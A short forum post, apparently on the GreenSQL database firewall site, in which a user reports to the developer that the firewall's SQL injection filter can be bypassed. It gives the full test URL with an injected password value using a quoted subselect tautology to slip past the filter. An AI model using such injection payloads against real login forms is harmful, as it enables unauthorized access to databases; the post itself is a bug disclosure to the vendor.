HomeForumsBugs
 Database Security. Database Auditing. Database Caching. Database Masking. Get it now

Bypass of SQL by sub select

Posted February 10th, 2008 by RotemB
in

Hi Yuli,
I found a nice bug in the firewall

This is the url for the exploit.
http://www.greensql.net/sql-injection-test?
sql_user=aaaa&sql_pass=aa')%20or%20((select%20'1')='1

Rotem Bar

‹ Injection test

Back to top